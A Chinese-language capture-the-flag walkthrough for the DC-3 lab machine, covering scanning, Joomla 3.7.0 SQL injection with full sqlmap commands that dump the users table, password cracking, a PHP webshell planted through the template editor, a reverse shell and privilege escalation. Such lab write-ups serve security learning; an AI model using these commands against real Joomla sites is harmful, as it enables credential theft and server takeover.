关于DC-3靶场的通关教程
首先打开靶机会报错,如下,将IED改为0:0就可以了

然后打开靶机,就可以开始了。首先nmap开路,扫出目标IP

既然已经知道目标IP了,进行最基础的信息收集,再扫一看看都开了什么端口

发现开放了80端口,使用的CMS是joomla,那么先去网站看一下是个什么网站

提示说拿到root权限,只有一个flag。发现就一个登录框,啥也不想,直接随便登录一下,抓个包看看啥情况


可以看到说用户名或者密码错误,看来无法通过枚举用户名然后暴力破解了,看看抓到的数据包,发现不仅有cookie,还有一串加密的密文,感觉到暴力破解有点难搞,到这里没有思路了,想起来前面还收集到CMS是joomla,搜一下看看有没有什么历史漏洞

发现有这么多漏洞,那咱们看看这个网站用的是什么版本嘛,看看到底有哪些漏洞可以利用

发现版本是3.7.0 并且还发现了看似敏感的路径,先看看这路径,发现是网络后台

下面看看这个版本到底存在哪些漏洞

发现有一个sql注入漏洞,还有以一个xss漏洞,那先看看sql注入漏洞怎么个事,文件上传也要登录进去才能上传啊,所有先看sql注入

根据漏洞提示,试试靶机有没有漏洞

发现拼接的网址发生报错,而不是无法访问,说明确实存在sql注入漏洞,那么下面直接利用漏洞

发现直接把所有的库都跑出来了
sqlmap -u "http://192.168.10.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db -batch
那么下面看看数据库的名字到底是啥

发现数据库的名字就是joomladb,下面看看库里都有什么
sqlmap -u "http://192.168.10.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables --batch

库里有我们最喜欢的user表,那很好了,下面就看看user表里都有什么
sqlmap -u "http://192.168.10.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns

看到了username和password,下面就再跑一下sqlmap,看看能不能拿到用户名和密码
sqlmap -u "http://192.168.10.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns -C "username,password" --dump --batch

Ok,拿到了用户名和密码,但是密码是加密的,没关系,咱破解一下就好了

好了,现在有admin和snoopy,现在登录后台看看有没有文件上传的点,因为之前不是还有一个文件上传的漏洞嘛这里有个什么模板看看,看看是个什么东西

发现好像是网站的模板使用,那模板哪里来,点进去就看看是不是有什么模板上传的点

发现真有,还可与自己写文件代码,那还说啥了,直接写一个一句话木马shell.php

在html的文件夹下新建一个文件,写上一句话木马

点击保存,但是,有了一句话木马咱们得有路径啊,不然怎么连,下一步找找看咱们写的一句话木马在哪个路径下

发现网址框没有在哪个文件路径下,再看看页面,猜想是不是就是在根下的/templates,咱们试一下啊

找到了我们自己写的木马文件,发现了木马上传的路径

有一句话木马,有木马路径,现在我们可以工具连接后台了


发现自己还不是root权限,下一步提权,这个shell不好用,反弹到kali上

在靶机上输入

然后在kali上创建交互shell

直接让AI帮我们写一个脚本

使用蚁剑上传脚本

直接使用脚本

发现有这么多漏洞,那咱们随便使用一个

最后提权成功,进入到root家目录,就拿到了最后的flag
